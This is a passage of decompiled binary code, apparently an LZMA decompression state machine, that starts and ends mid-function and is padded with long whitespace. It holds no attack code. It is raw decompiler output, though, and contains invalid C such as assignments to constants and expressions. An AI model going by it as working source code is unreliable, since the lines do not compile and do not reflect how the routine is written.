                                                                                                                        							L140:
                                                                                                                        							__eflags = _v112;
                                                                                                                        							if(_v112 == 0) {
                                                                                                                        								_v140 = 5;
                                                                                                                        								goto L173;
                                                                                                                        							}
                                                                                                                        							_v20 = _v20 << 8;
                                                                                                                        							_v112 = _v112 - 1;
                                                                                                                        							_t464 =  &_v116;
                                                                                                                        							 *_t464 = _v116 + 1;
                                                                                                                        							__eflags =  *_t464;
                                                                                                                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                        							L142:
                                                                                                                        							_t561 = _v136;
                                                                                                                        							goto L143;
                                                                                                                        						case 6:
                                                                                                                        							__edx = 0;
                                                                                                                        							__eflags = _v68;
                                                                                                                        							if(_v68 != 0) {
                                                                                                                        								__eax = _v8;
                                                                                                                        								__ecx = _v60;
                                                                                                                        								_v56 = 1;
                                                                                                                        								_v136 = 7;
                                                                                                                        								__esi = _v8 + 0x180 + _v60 * 2;
                                                                                                                        								goto L135;
                                                                                                                        							}
                                                                                                                        							__eax = _v96 & 0x000000ff;
                                                                                                                        							__esi = _v100;
                                                                                                                        							__cl = 8;
                                                                                                                        							__cl = 8 - _v64;
                                                                                                                        							__esi = _v100 & _v28;
                                                                                                                        							__eax = (_v96 & 0x000000ff) >> 8;
                                                                                                                        							__ecx = _v64;
                                                                                                                        							__esi = (_v100 & _v28) << 8;
                                                                                                                        							__ecx = _v8;
                                                                                                                        							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                                                                                        							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                                                                                        							__eflags = _v60 - 4;
                                                                                                                        							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                                                        							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                                                        							if(_v60 >= 4) {
                                                                                                                        								__eflags = _v60 - 0xa;
                                                                                                                        								if(_v60 >= 0xa) {
                                                                                                                        									_t103 =  &_v60;
                                                                                                                        									 *_t103 = _v60 - 6;
                                                                                                                        									__eflags =  *_t103;
                                                                                                                        								} else {
                                                                                                                        									_v60 = _v60 - 3;
                                                                                                                        								}
                                                                                                                        							} else {
                                                                                                                        								_v60 = 0;
                                                                                                                        							}
                                                                                                                        							__eflags = _v56 - __edx;
                                                                                                                        							if(_v56 == __edx) {
                                                                                                                        								__ebx = 0;
                                                                                                                        								__ebx = 1;
                                                                                                                        								goto L63;
                                                                                                                        							}
                                                                                                                        							__eax = _v24;
                                                                                                                        							__eax = _v24 - _v48;
                                                                                                                        							__eflags = __eax - _v120;
                                                                                                                        							if(__eax >= _v120) {
                                                                                                                        								__eax = __eax + _v120;
                                                                                                                        								__eflags = __eax;
                                                                                                                        							}
                                                                                                                        							__ecx = _v12;
                                                                                                                        							__ebx = 0;
                                                                                                                        							__ebx = 1;
                                                                                                                        							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                        							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                        							goto L43;
                                                                                                                        						case 7:
                                                                                                                        							__eflags = _v68 - 1;
                                                                                                                        							if(_v68 != 1) {
                                                                                                                        								__eax = _v40;
                                                                                                                        								_v132 = 0x16;
                                                                                                                        								_v36 = _v40;
                                                                                                                        								__eax = _v44;
                                                                                                                        								_v40 = _v44;
                                                                                                                        								__eax = _v48;
                                                                                                                        								_v44 = _v48;
                                                                                                                        								__eax = 0;
                                                                                                                        								__eflags = _v60 - 7;
                                                                                                                        								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                        								__al = __al & 0x000000fd;
                                                                                                                        								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                        								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                                                                                        								__eax = _v8;
                                                                                                                        								__eax = _v8 + 0x664;
                                                                                                                        								__eflags = __eax;
                                                                                                                        								_v92 = __eax;
                                                                                                                        								goto L71;
                                                                                                                        							}
                                                                                                                        							__eax = _v8;
                                                                                                                        							__ecx = _v60;
                                                                                                                        							_v136 = 8;
                                                                                                                        							__esi = _v8 + 0x198 + _v60 * 2;
                                                                                                                        							goto L135;
                                                                                                                        						case 8:
                                                                                                                        							__eflags = _v68;
                                                                                                                        							if(_v68 != 0) {
                                                                                                                        								__eax = _v8;
                                                                                                                        								__ecx = _v60;
                                                                                                                        								_v136 = 0xa;
                                                                                                                        								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                                                                                        							} else {
                                                                                                                        								__eax = _v60;
                                                                                                                        								__ecx = _v8;
                                                                                                                        								__eax = _v60 + 0xf;
                                                                                                                        								_v136 = 9;
                                                                                                                        								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                                                                                        								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                                                                                        							}
                                                                                                                        							goto L135;
                                                                                                                        						case 9:
                                                                                                                        							__eflags = _v68;
                                                                                                                        							if(_v68 != 0) {
                                                                                                                        								goto L92;
                                                                                                                        							}
                                                                                                                        							__eflags = _v100;
                                                                                                                        							if(_v100 == 0) {
                                                                                                                        								goto L174;
                                                                                                                        							}
                                                                                                                        							__eax = 0;
                                                                                                                        							__eflags = _v60 - 7;
                                                                                                                        							_t264 = _v60 - 7 >= 0;
                                                                                                                        							__eflags = _t264;
                                                                                                                        							0 | _t264 = _t264 + _t264 + 9;
                                                                                                                        							_v60 = _t264 + _t264 + 9;
                                                                                                                        							goto L78;
                                                                                                                        						case 0xa:
                                                                                                                        							__eflags = _v68;
                                                                                                                        							if(_v68 != 0) {
                                                                                                                        								__eax = _v8;
                                                                                                                        								__ecx = _v60;
                                                                                                                        								_v136 = 0xb;
                                                                                                                        								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                                                                                        								goto L135;
                                                                                                                        							}
                                                                                                                        							__eax = _v44;
                                                                                                                        							goto L91;
                                                                                                                        						case 0xb:
                                                                                                                        							__eflags = _v68;
                                                                                                                        							if(_v68 != 0) {
                                                                                                                        								__ecx = _v40;
                                                                                                                        								__eax = _v36;
                                                                                                                        								_v36 = _v40;
                                                                                                                        							} else {
                                                                                                                        								__eax = _v40;
                                                                                                                        							}
                                                                                                                        							__ecx = _v44;
                                                                                                                        							_v40 = _v44;
                                                                                                                        							L91:
                                                                                                                        							__ecx = _v48;
                                                                                                                        							_v48 = __eax;
                                                                                                                        							_v44 = _v48;
                                                                                                                        							L92:
                                                                                                                        							__eax = _v8;
                                                                                                                        							_v132 = 0x15;
                                                                                                                        							__eax = _v8 + 0xa68;
                                                                                                                        							_v92 = _v8 + 0xa68;
                                                                                                                        							goto L71;
                                                                                                                        						case 0xc:
                                                                                                                        							L102:
                                                                                                                        							__eflags = _v112;
                                                                                                                        							if(_v112 == 0) {
                                                                                                                        								_v140 = 0xc;
                                                                                                                        								goto L173;
                                                                                                                        							}
                                                                                                                        							__ecx = _v116;
                                                                                                                        							__eax = _v16;
                                                                                                                        							_v20 = _v20 << 8;
                                                                                                                        							__ecx =  *_v116 & 0x000000ff;
                                                                                                                        							_v112 = _v112 - 1;
                                                                                                                        							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                        							_t340 =  &_v116;
                                                                                                                        							 *_t340 = _v116 + 1;
                                                                                                                        							__eflags =  *_t340;
                                                                                                                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                        							__eax = _v48;
                                                                                                                        							goto L104;
                                                                                                                        						case 0xd:
                                                                                                                        							L39:
                                                                                                                        							__eflags = _v112;
                                                                                                                        							if(_v112 == 0) {
                                                                                                                        								_v140 = 0xd;
                                                                                                                        								goto L173;
                                                                                                                        							}
                                                                                                                        							__ecx = _v116;
                                                                                                                        							__eax = _v16;
                                                                                                                        							_v20 = _v20 << 8;
                                                                                                                        							__ecx =  *_v116 & 0x000000ff;
                                                                                                                        							_v112 = _v112 - 1;
                                                                                                                        							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                        							_t127 =  &_v116;
                                                                                                                        							 *_t127 = _v116 + 1;
                                                                                                                        							__eflags =  *_t127;
                                                                                                                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                        							L41:
                                                                                                                        							__eax = _v68;
                                                                                                                        							__eflags = _v76 - _v68;
                                                                                                                        							if(_v76 != _v68) {
                                                                                                                        								goto L50;
                                                                                                                        							}
                                                                                                                        							__eflags = __ebx - 0x100;
                                                                                                                        							if(__ebx >= 0x100) {
                                                                                                                        								goto L56;
                                                                                                                        							}
                                                                                                                        							L43:
                                                                                                                        							__eax = _v95 & 0x000000ff;
                                                                                                                        							_v95 = _v95 << 1;
                                                                                                                        							__ecx = _v92;
                                                                                                                        							__eax = (_v95 & 0x000000ff) >> 7;
                                                                                                                        							_v76 = __eax;
                                                                                                                        							__eax = __eax + 1;
                                                                                                                        							__eax = __eax << 8;
                                                                                                                        							__eax = __eax + __ebx;
                                                                                                                        							__esi = _v92 + __eax * 2;
                                                                                                                        							_v20 = _v20 >> 0xb;
                                                                                                                        							__ax =  *__esi;
                                                                                                                        							_v88 = __esi;
                                                                                                                        							__edx = __ax & 0x0000ffff;
                                                                                                                        							__ecx = (_v20 >> 0xb) * __edx;
                                                                                                                        							__eflags = _v16 - __ecx;
                                                                                                                        							if(_v16 >= __ecx) {
                                                                                                                        								_v20 = _v20 - __ecx;
                                                                                                                        								_v16 = _v16 - __ecx;
                                                                                                                        								__cx = __ax;
                                                                                                                        								_v68 = 1;
                                                                                                                        								__cx = __ax >> 5;
                                                                                                                        								__eflags = __eax;
                                                                                                                        								__ebx = __ebx + __ebx + 1;
                                                                                                                        								 *__esi = __ax;
                                                                                                                        							} else {
                                                                                                                        								_v68 = _v68 & 0x00000000;
                                                                                                                        								_v20 = __ecx;
                                                                                                                        								0x800 = 0x800 - __edx;
                                                                                                                        								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                        								__ebx = __ebx + __ebx;
                                                                                                                        								 *__esi = __cx;
                                                                                                                        							}
                                                                                                                        							__eflags = _v20 - 0x1000000;
                                                                                                                        							_v72 = __ebx;
                                                                                                                        							if(_v20 >= 0x1000000) {
                                                                                                                        								goto L41;
                                                                                                                        							} else {
                                                                                                                        								goto L39;
                                                                                                                        							}
                                                                                                                        						case 0xe:
                                                                                                                        							L48:
                                                                                                                        							__eflags = _v112;
                                                                                                                        							if(_v112 == 0) {
                                                                                                                        								_v140 = 0xe;
                                                                                                                        								goto L173;
                                                                                                                        							}
                                                                                                                        							__ecx = _v116;
                                                                                                                        							__eax = _v16;
                                                                                                                        							_v20 = _v20 << 8;
                                                                                                                        							__ecx =  *_v116 & 0x000000ff;
                                                                                                                        							_v112 = _v112 - 1;
                                                                                                                        							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                        							_t161 =  &_v116;
                                                                                                                        							 *_t161 = _v116 + 1;
                                                                                                                        							__eflags =  *_t161;
                                                                                                                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                        							while(1) {
                                                                                                                        								L50:
                                                                                                                        								__eflags = __ebx - 0x100;
                                                                                                                        								if(__ebx >= 0x100) {
                                                                                                                        									break;
                                                                                                                        								}
                                                                                                                        								__eax = _v92;
                                                                                                                        								__edx = __ebx + __ebx;
                                                                                                                        								__ecx = _v20;
                                                                                                                        								__esi = __edx + __eax;
                                                                                                                        								__ecx = _v20 >> 0xb;
                                                                                                                        								__ax =  *__esi;
                                                                                                                        								_v88 = __esi;
                                                                                                                        								__edi = __ax & 0x0000ffff;
                                                                                                                        								__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                        								__eflags = _v16 - __ecx;
                                                                                                                        								if(_v16 >= __ecx) {
                                                                                                                        									_v20 = _v20 - __ecx;
                                                                                                                        									_v16 = _v16 - __ecx;
                                                                                                                        									__cx = __ax;
                                                                                                                        									_t175 = __edx + 1; // 0x1
                                                                                                                        									__ebx = _t175;
                                                                                                                        									__cx = __ax >> 5;
                                                                                                                        									__eflags = __eax;
                                                                                                                        									 *__esi = __ax;
                                                                                                                        								} else {
                                                                                                                        									_v20 = __ecx;
                                                                                                                        									0x800 = 0x800 - __edi;
                                                                                                                        									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                        									__ebx = __ebx + __ebx;
                                                                                                                        									 *__esi = __cx;
                                                                                                                        								}
                                                                                                                        								__eflags = _v20 - 0x1000000;
                                                                                                                        								_v72 = __ebx;
                                                                                                                        								if(_v20 >= 0x1000000) {
                                                                                                                        									continue;
                                                                                                                        								} else {
                                                                                                                        									goto L48;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							L56:
                                                                                                                        							_t178 =  &_v56;
                                                                                                                        							 *_t178 = _v56 & 0x00000000;
                                                                                                                        							__eflags =  *_t178;
                                                                                                                        							goto L57;
                                                                                                                        						case 0xf:
                                                                                                                        							L60:
                                                                                                                        							__eflags = _v112;
                                                                                                                        							if(_v112 == 0) {
                                                                                                                        								_v140 = 0xf;
                                                                                                                        								goto L173;
                                                                                                                        							}
                                                                                                                        							__ecx = _v116;
                                                                                                                        							__eax = _v16;
                                                                                                                        							_v20 = _v20 << 8;
                                                                                                                        							__ecx =  *_v116 & 0x000000ff;
                                                                                                                        							_v112 = _v112 - 1;
                                                                                                                        							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                        							_t208 =  &_v116;
                                                                                                                        							 *_t208 = _v116 + 1;
                                                                                                                        							__eflags =  *_t208;
                                                                                                                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                        							L62:
                                                                                                                        							__eflags = __ebx - 0x100;
                                                                                                                        							if(__ebx >= 0x100) {
                                                                                                                        								L57:
                                                                                                                        								__al = _v72;
                                                                                                                        								_v96 = _v72;
                                                                                                                        								goto L58;
                                                                                                                        							}
                                                                                                                        							L63:
                                                                                                                        							__eax = _v92;
                                                                                                                        							__edx = __ebx + __ebx;
                                                                                                                        							__ecx = _v20;
                                                                                                                        							__esi = __edx + __eax;
                                                                                                                        							__ecx = _v20 >> 0xb;
                                                                                                                        							__ax =  *__esi;
                                                                                                                        							_v88 = __esi;
                                                                                                                        							__edi = __ax & 0x0000ffff;
                                                                                                                        							__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                        							__eflags = _v16 - __ecx;
                                                                                                                        							if(_v16 >= __ecx) {
                                                                                                                        								_v20 = _v20 - __ecx;
                                                                                                                        								_v16 = _v16 - __ecx;
                                                                                                                        								__cx = __ax;
                                                                                                                        								_t222 = __edx + 1; // 0x1
                                                                                                                        								__ebx = _t222;
                                                                                                                        								__cx = __ax >> 5;
                                                                                                                        								__eflags = __eax;
                                                                                                                        								 *__esi = __ax;
                                                                                                                        							} else {
                                                                                                                        								_v20 = __ecx;
                                                                                                                        								0x800 = 0x800 - __edi;
                                                                                                                        								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                        								__ebx = __ebx + __ebx;
                                                                                                                        								 *__esi = __cx;
                                                                                                                        							}
                                                                                                                        							__eflags = _v20 - 0x1000000;
                                                                                                                        							_v72 = __ebx;
                                                                                                                        							if(_v20 >= 0x1000000) {
                                                                                                                        								goto L62;
                                                                                                                        							} else {
                                                                                                                        								goto L60;
                                                                                                                        							}
                                                                                                                        						case 0x10:
                                                                                                                        							L112:
                                                                                                                        							__eflags = _v112;
                                                                                                                        							if(_v112 == 0) {
                                                                                                                        								_v140 = 0x10;
                                                                                                                        								goto L173;
                                                                                                                        							}
                                                                                                                        							__ecx = _v116;
                                                                                                                        							__eax = _v16;
                                                                                                                        							_v20 = _v20 << 8;
                                                                                                                        							__ecx =  *_v116 & 0x000000ff;
                                                                                                                        							_v112 = _v112 - 1;
                                                                                                                        							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                        							_t371 =  &_v116;
                                                                                                                        							 *_t371 = _v116 + 1;
                                                                                                                        							__eflags =  *_t371;
                                                                                                                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                        							goto L114;
                                                                                                                        						case 0x11:
                                                                                                                        							L71:
                                                                                                                        							__esi = _v92;
                                                                                                                        							_v136 = 0x12;
                                                                                                                        							goto L135;
                                                                                                                        						case 0x12:
                                                                                                                        							__eflags = _v68;
                                                                                                                        							if(_v68 != 0) {
                                                                                                                        								__eax = _v92;
                                                                                                                        								_v136 = 0x13;
                                                                                                                        								__esi = _v92 + 2;
                                                                                                                        								L135:
                                                                                                                        								_v88 = _t626;
                                                                                                                        								goto L136;
                                                                                                                        							}
                                                                                                                        							__eax = _v80;
                                                                                                                        							_v52 = _v52 & 0x00000000;
                                                                                                                        							__ecx = _v92;
                                                                                                                        							__eax = _v80 << 4;
                                                                                                                        							__eflags = __eax;
                                                                                                                        							__eax = _v92 + __eax + 4;
                                                                                                                        							goto L133;
                                                                                                                        						case 0x13:
                                                                                                                        							__eflags = _v68;
                                                                                                                        							if(_v68 != 0) {
                                                                                                                        								_t475 =  &_v92;
                                                                                                                        								 *_t475 = _v92 + 0x204;
                                                                                                                        								__eflags =  *_t475;
                                                                                                                        								_v52 = 0x10;
                                                                                                                        								_v68 = 8;
                                                                                                                        								L147:
                                                                                                                        								_v128 = 0x14;
                                                                                                                        								goto L148;
                                                                                                                        							}
                                                                                                                        							__eax = _v80;
                                                                                                                        							__ecx = _v92;
                                                                                                                        							__eax = _v80 << 4;
                                                                                                                        							_v52 = 8;
                                                                                                                        							__eax = _v92 + (_v80 << 4) + 0x104;
                                                                                                                        							L133:
                                                                                                                        							_v92 = __eax;
                                                                                                                        							_v68 = 3;
                                                                                                                        							goto L147;
                                                                                                                        						case 0x14:
                                                                                                                        							_v52 = _v52 + __ebx;
                                                                                                                        							__eax = _v132;
                                                                                                                        							goto L143;
                                                                                                                        						case 0x15:
                                                                                                                        							__eax = 0;
                                                                                                                        							__eflags = _v60 - 7;
                                                                                                                        							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                        							__al = __al & 0x000000fd;
                                                                                                                        							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                        							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                                                                                        							goto L123;
                                                                                                                        						case 0x16:
                                                                                                                        							__eax = _v52;
                                                                                                                        							__eflags = __eax - 4;
                                                                                                                        							if(__eax >= 4) {
                                                                                                                        								_push(3);
                                                                                                                        								_pop(__eax);
                                                                                                                        							}
                                                                                                                        							__ecx = _v8;
                                                                                                                        							_v68 = 6;
                                                                                                                        							__eax = __eax << 7;
                                                                                                                        							_v128 = 0x19;
                                                                                                                        							_v92 = __eax;
                                                                                                                        							goto L148;
                                                                                                                        						case 0x17:
                                                                                                                        							L148:
                                                                                                                        							__eax = _v68;
                                                                                                                        							_v84 = 1;
                                                                                                                        							_v76 = _v68;
                                                                                                                        							goto L152;
                                                                                                                        						case 0x18:
                                                                                                                        							L149:
                                                                                                                        							__eflags = _v112;
                                                                                                                        							if(_v112 == 0) {
                                                                                                                        								_v140 = 0x18;
                                                                                                                        								goto L173;
                                                                                                                        							}
                                                                                                                        							__ecx = _v116;
                                                                                                                        							__eax = _v16;
                                                                                                                        							_v20 = _v20 << 8;
                                                                                                                        							__ecx =  *_v116 & 0x000000ff;
                                                                                                                        							_v112 = _v112 - 1;
                                                                                                                        							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                        							_t490 =  &_v116;
                                                                                                                        							 *_t490 = _v116 + 1;
                                                                                                                        							__eflags =  *_t490;
                                                                                                                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                        							L151:
                                                                                                                        							_t493 =  &_v76;
                                                                                                                        							 *_t493 = _v76 - 1;
                                                                                                                        							__eflags =  *_t493;
                                                                                                                        							L152:
                                                                                                                        							__eflags = _v76;
                                                                                                                        							if(_v76 <= 0) {
                                                                                                                        								__ecx = _v68;
                                                                                                                        								__ebx = _v84;
                                                                                                                        								0 = 1;
                                                                                                                        								__eax = 1 << __cl;
                                                                                                                        								__ebx = _v84 - (1 << __cl);
                                                                                                                        								__eax = _v128;
                                                                                                                        								_v72 = __ebx;
                                                                                                                        								L143:
                                                                                                                        								_v140 = _t561;
                                                                                                                        								goto L3;
                                                                                                                        							}
                                                                                                                        							__eax = _v84;
                                                                                                                        							_v20 = _v20 >> 0xb;
                                                                                                                        							__edx = _v84 + _v84;
                                                                                                                        							__eax = _v92;
                                                                                                                        							__esi = __edx + __eax;
                                                                                                                        							_v88 = __esi;
                                                                                                                        							__ax =  *__esi;
                                                                                                                        							__edi = __ax & 0x0000ffff;
                                                                                                                        							__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                        							__eflags = _v16 - __ecx;
                                                                                                                        							if(_v16 >= __ecx) {
                                                                                                                        								_v20 = _v20 - __ecx;
                                                                                                                        								_v16 = _v16 - __ecx;
                                                                                                                        								__cx = __ax;
                                                                                                                        								__cx = __ax >> 5;
                                                                                                                        								__eax = __eax - __ecx;
                                                                                                                        								__edx = __edx + 1;
                                                                                                                        								__eflags = __edx;
                                                                                                                        								 *__esi = __ax;
                                                                                                                        								_v84 = __edx;
                                                                                                                        							} else {
                                                                                                                        								_v20 = __ecx;
                                                                                                                        								0x800 = 0x800 - __edi;
                                                                                                                        								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                        								_v84 = _v84 << 1;
                                                                                                                        								 *__esi = __cx;
                                                                                                                        							}
                                                                                                                        							__eflags = _v20 - 0x1000000;
                                                                                                                        							if(_v20 >= 0x1000000) {
                                                                                                                        								goto L151;
                                                                                                                        							} else {
                                                                                                                        								goto L149;
                                                                                                                        							}
                                                                                                                        						case 0x19:
                                                                                                                        							__eflags = __ebx - 4;
                                                                                                                        							if(__ebx < 4) {
                                                                                                                        								_v48 = __ebx;
                                                                                                                        								L122:
                                                                                                                        								_t399 =  &_v48;
                                                                                                                        								 *_t399 = _v48 + 1;
                                                                                                                        								__eflags =  *_t399;
                                                                                                                        								L123:
                                                                                                                        								__eax = _v48;
                                                                                                                        								__eflags = __eax;
                                                                                                                        								if(__eax == 0) {
                                                                                                                        									_v52 = _v52 | 0xffffffff;
                                                                                                                        									goto L173;
                                                                                                                        								}
                                                                                                                        								__eflags = __eax - _v100;
                                                                                                                        								if(__eax > _v100) {
                                                                                                                        									goto L174;
                                                                                                                        								}
                                                                                                                        								_v52 = _v52 + 2;
                                                                                                                        								__eax = _v52;
                                                                                                                        								_t406 =  &_v100;
                                                                                                                        								 *_t406 = _v100 + _v52;
                                                                                                                        								__eflags =  *_t406;
                                                                                                                        								goto L126;
                                                                                                                        							}
                                                                                                                        							__ecx = __ebx;
                                                                                                                        							__eax = __ebx;
                                                                                                                        							__ecx = __ebx >> 1;
                                                                                                                        							__eax = __ebx & 0x00000001;
                                                                                                                        							__ecx = (__ebx >> 1) - 1;
                                                                                                                        							__al = __al | 0x00000002;
                                                                                                                        							__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                        							__eflags = __ebx - 0xe;
                                                                                                                        							_v48 = __eax;
                                                                                                                        							if(__ebx >= 0xe) {
                                                                                                                        								__ebx = 0;
                                                                                                                        								_v76 = __ecx;
                                                                                                                        								L105:
                                                                                                                        								__eflags = _v76;
                                                                                                                        								if(_v76 <= 0) {
                                                                                                                        									__eax = __eax + __ebx;
                                                                                                                        									_v68 = 4;
                                                                                                                        									_v48 = __eax;
                                                                                                                        									__eax = _v8;
                                                                                                                        									__eax = _v8 + 0x644;
                                                                                                                        									__eflags = __eax;
                                                                                                                        									L111:
                                                                                                                        									__ebx = 0;
                                                                                                                        									_v92 = __eax;
                                                                                                                        									_v84 = 1;
                                                                                                                        									_v72 = 0;
                                                                                                                        									_v76 = 0;
                                                                                                                        									L115:
                                                                                                                        									__eax = _v68;
                                                                                                                        									__eflags = _v76 - _v68;
                                                                                                                        									if(_v76 >= _v68) {
                                                                                                                        										_t397 =  &_v48;
                                                                                                                        										 *_t397 = _v48 + __ebx;
                                                                                                                        										__eflags =  *_t397;
                                                                                                                        										goto L122;
                                                                                                                        									}
                                                                                                                        									__eax = _v84;
                                                                                                                        									_v20 = _v20 >> 0xb;
                                                                                                                        									__edi = _v84 + _v84;
                                                                                                                        									__eax = _v92;
                                                                                                                        									__esi = __edi + __eax;
                                                                                                                        									_v88 = __esi;
                                                                                                                        									__ax =  *__esi;
                                                                                                                        									__ecx = __ax & 0x0000ffff;
                                                                                                                        									__edx = (_v20 >> 0xb) * __ecx;
                                                                                                                        									__eflags = _v16 - __edx;
                                                                                                                        									if(_v16 >= __edx) {
                                                                                                                        										__ecx = 0;
                                                                                                                        										_v20 = _v20 - __edx;
                                                                                                                        										__ecx = 1;
                                                                                                                        										_v16 = _v16 - __edx;
                                                                                                                        										__ebx = 1;
                                                                                                                        										__ecx = _v76;
                                                                                                                        										__ebx = 1 << __cl;
                                                                                                                        										__ecx = 1 << __cl;
                                                                                                                        										__ebx = _v72;
                                                                                                                        										__ebx = _v72 | __ecx;
                                                                                                                        										__cx = __ax;
                                                                                                                        										__cx = __ax >> 5;
                                                                                                                        										__eax = __eax - __ecx;
                                                                                                                        										__edi = __edi + 1;
                                                                                                                        										__eflags = __edi;
                                                                                                                        										_v72 = __ebx;
                                                                                                                        										 *__esi = __ax;
                                                                                                                        										_v84 = __edi;
                                                                                                                        									} else {
                                                                                                                        										_v20 = __edx;
                                                                                                                        										0x800 = 0x800 - __ecx;
                                                                                                                        										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                        										_v84 = _v84 << 1;
                                                                                                                        										 *__esi = __dx;
                                                                                                                        									}
                                                                                                                        									__eflags = _v20 - 0x1000000;
                                                                                                                        									if(_v20 >= 0x1000000) {
                                                                                                                        										L114:
                                                                                                                        										_t374 =  &_v76;
                                                                                                                        										 *_t374 = _v76 + 1;
                                                                                                                        										__eflags =  *_t374;
                                                                                                                        										goto L115;
                                                                                                                        									} else {
                                                                                                                        										goto L112;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								__ecx = _v16;
                                                                                                                        								__ebx = __ebx + __ebx;
                                                                                                                        								_v20 = _v20 >> 1;
                                                                                                                        								__eflags = _v16 - _v20;
                                                                                                                        								_v72 = __ebx;
                                                                                                                        								if(_v16 >= _v20) {
                                                                                                                        									__ecx = _v20;
                                                                                                                        									_v16 = _v16 - _v20;
                                                                                                                        									__ebx = __ebx | 0x00000001;
                                                                                                                        									__eflags = __ebx;
                                                                                                                        									_v72 = __ebx;
                                                                                                                        								}
                                                                                                                        								__eflags = _v20 - 0x1000000;
                                                                                                                        								if(_v20 >= 0x1000000) {
                                                                                                                        									L104:
                                                                                                                        									_t344 =  &_v76;
                                                                                                                        									 *_t344 = _v76 - 1;
                                                                                                                        									__eflags =  *_t344;
                                                                                                                        									goto L105;
                                                                                                                        								} else {
                                                                                                                        									goto L102;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							__edx = _v8;
                                                                                                                        							__eax = __eax - __ebx;
                                                                                                                        							_v68 = __ecx;
                                                                                                                        							__eax = _v8 + 0x55e + __eax * 2;
                                                                                                                        							goto L111;
                                                                                                                        						case 0x1a:
                                                                                                                        							L58:
                                                                                                                        							__eflags = _v104;
                                                                                                                        							if(_v104 == 0) {
                                                                                                                        								_v140 = 0x1a;
                                                                                                                        								goto L173;
                                                                                                                        							}
                                                                                                                        							__ecx = _v108;
                                                                                                                        							__al = _v96;
                                                                                                                        							__edx = _v12;
                                                                                                                        							_v100 = _v100 + 1;
                                                                                                                        							_v108 = _v108 + 1;
                                                                                                                        							_v104 = _v104 - 1;
                                                                                                                        							 *_v108 = __al;
                                                                                                                        							__ecx = _v24;
                                                                                                                        							 *(_v12 + __ecx) = __al;
                                                                                                                        							__eax = __ecx + 1;
                                                                                                                        							__edx = 0;
                                                                                                                        							_t197 = __eax % _v120;
                                                                                                                        							__eax = __eax / _v120;
                                                                                                                        							__edx = _t197;
                                                                                                                        							goto L82;
                                                                                                                        						case 0x1b:
                                                                                                                        							L78:
                                                                                                                        							__eflags = _v104;
                                                                                                                        							if(_v104 == 0) {
                                                                                                                        								_v140 = 0x1b;
                                                                                                                        								goto L173;
                                                                                                                        							}
                                                                                                                        							__eax = _v24;
                                                                                                                        							__eax = _v24 - _v48;
                                                                                                                        							__eflags = __eax - _v120;
                                                                                                                        							if(__eax >= _v120) {
                                                                                                                        								__eax = __eax + _v120;
                                                                                                                        								__eflags = __eax;
                                                                                                                        							}
                                                                                                                        							__edx = _v12;
                                                                                                                        							__cl =  *(__edx + __eax);
                                                                                                                        							__eax = _v24;
                                                                                                                        							_v96 = __cl;
                                                                                                                        							 *(__edx + __eax) = __cl;
                                                                                                                        							__eax = __eax + 1;
                                                                                                                        							__edx = 0;
                                                                                                                        							_t280 = __eax % _v120;
                                                                                                                        							__eax = __eax / _v120;
                                                                                                                        							__edx = _t280;
                                                                                                                        							__eax = _v108;
                                                                                                                        							_v100 = _v100 + 1;
                                                                                                                        							_v108 = _v108 + 1;
                                                                                                                        							_t289 =  &_v104;
